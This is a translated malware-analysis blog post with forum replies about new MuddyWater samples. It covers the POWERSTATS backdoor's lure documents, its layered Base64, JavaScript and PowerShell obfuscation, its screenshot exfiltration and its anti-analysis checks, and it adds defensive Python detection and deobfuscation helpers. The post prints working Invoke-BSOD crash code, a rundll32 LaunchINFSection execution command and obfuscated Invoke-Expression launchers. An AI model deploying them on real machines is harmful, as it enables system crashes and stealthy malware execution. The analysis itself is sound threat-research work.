[Translation] Analysis of New "MuddyWater" Attack Samples
2018-5-18 15:53 4834

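Introduction

It has been two months since I last wrote an article analyzing the "MuddyWater" attacks. At the time I naively assumed they would go quiet for a while; that now looks far too optimistic. Since this week I have kept capturing new samples. Although they share a lot with the earlier samples, the new ones have, as expected, improved their obfuscation. Our focus remains the layered obfuscation and the PowerShell code, but I will compare against the earlier samples and mark what has improved in the new ones.

Below are screenshots of the lure documents used in this attack; the file hashes are given at the end of the article:

Figure 1: Election Commission of Pakistan

Figure 2: Invest in Turkey website

Figure 3: IQMOFA

Figure 4: National Assembly of Pakistan

Figure 5: Turkey security guide

As the images above show, the targets of this attack are still the Middle East (Turkey and Iraq) and Pakistan. As mentioned in my previous blog post, these lure documents tell us, to some extent, which organizations and businesses are being targeted. Judging by VT submission times, this attack ran from mid-February up to the most recently captured sample, dated May 6, 2018. Most of these samples are named "mofa.gov.iq.doc" (94625dd8151814dd6186735a6a6a87b2a4c71c04b8402caf314fb6f98434eaad); MOFA is the abbreviation of Ministry of Foreign Affairs.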

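Step-by-step analysis

Now we move on to the detailed analysis of the sample. I will highlight the new or changed obfuscation code in the POWERSTATS backdoor, as well as any added functionality. The macro code in this sample document contains several Base64-encoded blocks, as shown in the figures below:

Figure 6: Macro code

Figure 7: First Base64-encoded block

Figure 8: Second Base64-encoded block

Figure 9: Third Base64-encoded block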

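  • Base64-decoding the first block yields the encoded data shown below:
    Figure 10: Encoded data
  • The second block Base64-decodes to "c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\ProgramData\EventManager.logs,Defender,1,"
  • The third block decodes to XML containing obfuscated JavaScript, as shown below:
    Figure 11: JavaScript encoded in XML

    Extracting the JavaScript from the XML:
    Figure 12: Decoded JavaScript

The decoded script is actually a PowerShell script whose job is to further decode the file at the path "C:\\ProgramData\\WindowsDefenderService.ini". The file at this path is in fact the content of the first Base64-encoded block.
The decoded content is a variant of the POWERSTATS backdoor. Let us look closely at the obfuscation layers in this variant.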
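
A defender can hunt for the decoded second block in process-creation logs. The following Python code is an added example, not code from the original article: it parses a rundll32 advpack.dll,LaunchINFSection command line and flags two traits of the command quoted above. The function names, the two heuristics and the benign sample lines are assumptions made for illustration.

```python
import re
from pathlib import PureWindowsPath

# rundll32.exe advpack.dll,LaunchINFSection <inf file>,<section>,<flags>,...
LAUNCH_INF = re.compile(
    r'rundll32(?:\.exe)?"?\s+"?advpack(?:\.dll)?"?\s*,\s*LaunchINFSection\s+(?P<args>.+)',
    re.IGNORECASE,
)


def parse_launch_inf(cmdline):
    """Split a LaunchINFSection command line into INF path, section and flags."""
    m = LAUNCH_INF.search(cmdline)
    if m is None:
        return None
    fields = [f.strip().strip('"') for f in m.group("args").split(",")]
    fields += [""] * (3 - len(fields))  # pad when section or flags are omitted
    return {"inf": PureWindowsPath(fields[0]), "section": fields[1], "flags": fields[2]}


def review(cmdline):
    """Return the reasons (possibly none) why a command line deserves a closer look."""
    parsed = parse_launch_inf(cmdline)
    if parsed is None:
        return []
    reasons = []
    inf = parsed["inf"]
    # Heuristic 1 (assumption): legitimate installers pass a file ending in .inf.
    if inf.suffix.lower() != ".inf":
        reasons.append("INF directives loaded from a non-.inf file: " + inf.name)
    # Heuristic 2 (assumption): ProgramData is a user-writable staging location.
    if "programdata" in [p.lower() for p in inf.parts]:
        reasons.append("INF file sits under ProgramData")
    return reasons


# Constructed process-creation command lines; the first is the decoded string
# quoted in the article, the other two are made-up benign entries.
EVENTS = [
    r"c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\ProgramData\EventManager.logs,Defender,1,",
    r"rundll32.exe advpack.dll,LaunchINFSection C:\Windows\INF\sample.inf,DefaultInstall,1,",
    r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl",
]


def triage(events):
    """Map each suspicious command line to the reasons it was flagged."""
    return {e: review(e) for e in events if review(e)}


if __name__ == "__main__":
    for cmd, why in triage(EVENTS).items():
        print(cmd)
        for reason in why:
            print("   ", reason)
```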

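  • First, Base64 decoding yields encoded PowerShell.
    Figure 13: First encoded PowerShell block

Note that iex in the code is the short form (alias) of Invoke-Expression. To see the output, we replace iex with Write-Output, which gives the following:
Figure 14: First layer decoded

It looks messy, yet somewhat familiar: character substitution. Looking further, we notice "&((vaRIABle 'MDR').NAME[3,11,2]-jOiN'')" in the figure above, which is in fact an obfuscated Invoke-Expression. That means we can again replace it with Write-Output, with the following result:
Figure 15: Second layer decoded
Once again, you will notice that "( $enV:ComSpEc[4,24,25]-jOiN'')" is used as iex. It too can be replaced with Write-Output. This cycle of obfuscation repeats until the decoded script resembles the one shown below, which contains the proxy URLs and IPs:
Figure 16: Final decoded PowerShell
This is only one small piece of the many multi-layer encoded PowerShell scripts. The remaining second and third parts are the backdoor's actual functionality.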
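
The manual substitution described above can be automated statically, without running the sample. This added Python example (not part of the original article) resolves index-and-join launchers such as the two quoted above and swaps any that spell iex for Write-Output. It assumes the default ComSpec value and that the 'MDR' lookup resolves to the built-in MaximumDriveCount variable; the sample script lines are constructed.

```python
import re

# Assumptions (not from the page): the default %ComSpec% value and a few of
# PowerShell's built-in variable names that a wildcard lookup could match.
COMSPEC = r"C:\Windows\system32\cmd.exe"
VARIABLE_NAMES = ["MaximumDriveCount", "MaximumHistoryCount", "PSHOME", "ShellId"]

# Matches ( <source>[i,j,k]-join'' ) where <source> is $env:ComSpec or
# (variable '<pattern>').Name, optionally preceded by a call operator (& or .).
LAUNCHER = re.compile(
    r"""[&.]?\s*\(\s*
        (?: \$env:comspec
          | \(\s*(?:get-variable|variable|gv)\s+'(?P<pat>[^']+)'\s*\)\.name )
        \s*\[(?P<idx>[\d,\s]+)\]\s*-join\s*''\s*\)""",
    re.IGNORECASE | re.VERBOSE,
)
# Plain spellings. This is a text-level match, so it also hits string literals.
PLAIN_IEX = re.compile(r"(?<![\w$.-])(?:iex|invoke-expression)(?![\w-])", re.IGNORECASE)


def resolve(match):
    """Return the string a launcher evaluates to, or None if it cannot be resolved."""
    pattern = match.group("pat")
    if pattern is None:
        source = COMSPEC
    else:
        needle = pattern.replace("*", "").lower()
        hits = [n for n in VARIABLE_NAMES if needle in n.lower()]
        if len(hits) != 1:
            return None  # unknown or ambiguous variable: leave the text alone
        source = hits[0]
    indexes = [int(i) for i in match.group("idx").split(",") if i.strip()]
    if not indexes or max(indexes) >= len(source):
        return None
    return "".join(source[i] for i in indexes)


def neutralize(script):
    """Replace every recognised Invoke-Expression launcher with Write-Output."""
    found = []

    def swap(match):
        value = resolve(match)
        if value is None or value.lower() != "iex":
            return match.group(0)  # not an iex launcher, keep as written
        found.append(match.group(0))
        return "Write-Output"

    def swap_plain(match):
        found.append(match.group(0))
        return "Write-Output"

    script = LAUNCHER.sub(swap, script)
    script = PLAIN_IEX.sub(swap_plain, script)
    return script, found


# Constructed sample: launcher forms quoted in the article around dummy payloads.
SAMPLE = "\n".join([
    "iEx ( 'constructed layer 0' )",
    "&((vaRIABle 'MDR').NAME[3,11,2]-jOiN'') ( 'constructed layer 1' )",
    "'constructed layer 2' | .( $enV:ComSpEc[4,24,25]-jOiN'')",
    "&( $env:ComSpec[0,1,2]-join'') 'not a launcher'",
])

if __name__ == "__main__":
    safe, launchers = neutralize(SAMPLE)
    print(safe)
    print("neutralized:", launchers)
```

The rewritten script still has to be evaluated in an isolated analysis environment to obtain the next layer; the helper only removes the execution step, as the manual Write-Output substitution does.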

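Old versus new

Most of the functions I analyzed in my earlier blog post still exist in variant form. There is, of course, also some newly added and improved code:

  • The screenshot part has been rewritten, but its functionality is unchanged. It captures the victim host's screen, saves it in PNG format, Base64-encodes the image bytes and finally uploads them to the C&C server.
    Figure 17: Screenshot function and encoding
  • BSOD code that crashes the machine with a blue screen. This part mainly consists of anti-debugging and anti-analysis techniques:
    Figure 18: Searching for VM processes

The function "GDKZVLJXGAPYNUGCPJNPGZQPOLPPBG", highlighted at the bottom of the figure, is the start of the following code block: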

function GDKZVLJXGAPYNUGCPJNPGZQPOLPPBG(){
    $s = @"
using System;
using System.Runtime.InteropServices;
public static class C{
    [DllImport("ntdll.dll")]
    public static extern uint RtlAdjustPrivilege(int Privilege, bool bEnablePrivilege, bool IsThreadPrivilege, out bool PreviousValue);
    [DllImport("ntdll.dll")]
    public static extern uint NtRaiseHardError(uint ErrorStatus, uint NumberOfParameters, uint UnicodeStringParameterMask, IntPtr Parameters, uint ValidResponseOption, out uint Response);
    public static unsafe void Kill(){
        Boolean tmp1;
        uint tmp2;
        RtlAdjustPrivilege(19, true, false, out tmp1);
        NtRaiseHardError(0xc0000022, 0, 0, IntPtr.Zero, 6, out tmp2);
    }
}
"@
    $c = new-object -typename system.CodeDom.Compiler.CompilerParameters
    $c.CompilerOptions = '/unsafe'
    $a = Add-Type -TypeDefinition $s -Language CSharp -PassThru -CompilerParameters $c
    [C]::Kill()
}

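This code is in fact the Invoke-BSOD project created last month by Barrett Adams (@peewpw), which can be found on his GitHub page. Note in particular that the author states this code can BSOD a machine without administrator privileges.

  • In addition, the backdoor has a function that searches the ProgramData folder for the strings "Kasper", "Panda" and "ESET". If any such string is present, the screenshot and upload parts are terminated immediately.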

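Summary

Taken together with the earlier analysis, this attack group is still active and is targeting more countries. Overall, the characteristics of the "MuddyWater" attacks are:

  • The backdoor is wrapped in several layers of obfuscation: Base64 -> JavaScript obfuscated inside XML -> obfuscated PowerShell;
  • BSOD code has been introduced into POWERSTATS to hinder debugging and analysis;
  • Lateral movement relies only on DDEInitiate; the earlier methods appear to have been abandoned.

[Original]: (https://sec0wn.blogspot.ae/2018/05/clearing-muddywater-analysis-of-new.html?m=1)
Translated by: Kanxue Translation Team, StrokMitream
Proofread by: Kanxue Translation Team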

Appendix

Hashes

94625dd8151814dd6186735a6a6a87b2a4c71c04b8402caf314fb6f98434eaad
5c7d16bd89ef37fe02cac1851e7214a01636ee4061a80bfdbde3a2d199721a79
76e9988dad0278998861717c774227bf94112db548946ef617bfaa262cb5e338
707d2128a0c326626adef0d3a4cab78562abd82c2bd8ede8cc82f86c01f1e024
b7b8faac19a58548b28506415f9ece479055e9af0557911ca8bbaa82b483ffb8
18cf5795c2208d330bd297c18445a9e25238dd7f28a1a6ef55e2a9239f5748cd

List of infected URLs

Last edited by kanxue on 2019-2-2 14:35

Latest replies (3)

ZhuDebug 2018-5-19 14:43
Nice article

CCkicker 2018-6-5 17:06
The images are not hosted locally and can easily be lost; in future you can paste them in directly with the keyboard shortcut or upload them directly~